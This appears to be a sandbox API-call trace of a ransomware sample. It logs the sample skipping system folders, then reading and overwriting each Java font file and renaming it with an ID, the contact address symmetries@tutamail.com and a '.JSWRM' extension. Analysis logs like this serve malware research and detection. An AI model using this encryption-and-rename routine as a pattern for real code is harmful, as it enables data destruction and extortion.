[0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="windows") returned -1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="recovery") returned -1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="perflogs") returned -1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="documents and settings") returned 1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="system volume information") returned -1 [0070.399] lstrcmpiW (lpString1="LucidaBrightDemiBold.ttf", lpString2="msocache") returned -1 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiBold.ttf", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiBold.ttf", lpUsedDefaultChar=0x0) returned 24 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.400] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.400] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=75144) returned 1 [0070.400] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12580) returned 0x24e1e0 [0070.400] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x12580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x12580, lpOverlapped=0x0) returned 1 [0070.406] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.406] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x12580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x12580, lpOverlapped=0x0) returned 1 [0070.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.406] CloseHandle (hObject=0x458) returned 1 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0070.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0070.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.407] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiBold.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemibold.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.408] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12574, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaBrightDemiItalic.ttf", cAlternateFileName="LUCIDA~2.TTF")) returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2=".") returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="..") returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="...") returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="windows") returned -1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="recovery") returned -1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="perflogs") returned -1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="documents and settings") returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="system volume information") returned -1 [0070.408] lstrcmpiW (lpString1="LucidaBrightDemiItalic.ttf", lpString2="msocache") returned -1 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x241330, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiItalic.ttf", lpUsedDefaultChar=0x0) returned 26 [0070.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightDemiItalic.ttf", cchWideChar=26, lpMultiByteStr=0x2413a8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightDemiItalic.ttf", lpUsedDefaultChar=0x0) returned 26 [0070.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.408] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.408] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=75124) returned 1 [0070.409] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12570) returned 0x24e1e0 [0070.409] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x12570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x12570, lpOverlapped=0x0) returned 1 [0070.414] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.414] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x12570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x12570, lpOverlapped=0x0) returned 1 [0070.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.415] CloseHandle (hObject=0x458) returned 1 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0070.415] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0070.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightDemiItalic.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightdemiitalic.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0070.416] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13bd8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaBrightItalic.ttf", cAlternateFileName="LUCIDA~3.TTF")) returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2=".") returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="..") returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="...") returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="windows") returned -1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="recovery") returned -1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="perflogs") returned -1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="documents and settings") returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="$RECYCLE.BIN") returned 1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="system volume information") returned -1 [0070.416] lstrcmpiW (lpString1="LucidaBrightItalic.ttf", lpString2="msocache") returned -1 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightItalic.ttf", lpUsedDefaultChar=0x0) returned 22 [0070.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LucidaBrightItalic.ttf", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LucidaBrightItalic.ttf", lpUsedDefaultChar=0x0) returned 22 [0070.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.416] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.416] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=80856) returned 1 [0070.417] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13bd0) returned 0x24e1e0 [0070.417] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x13bd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x13bd0, lpOverlapped=0x0) returned 1 [0070.445] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.445] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x13bd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x13bd0, lpOverlapped=0x0) returned 1 [0070.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.445] CloseHandle (hObject=0x458) returned 1 [0070.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0070.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0070.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0070.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0070.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0070.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.446] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\LucidaBrightItalic.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fonts\\lucidabrightitalic.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0070.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.447] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5434c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LucidaBrightRegular.ttf", cAlternateFileName="LUCIDA~4.TTF")) returned 1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2=".") returned 1 [0070.447] lstrcmpiW (lpString1="LucidaBrightRegular.ttf", lpString2="..") returned 1 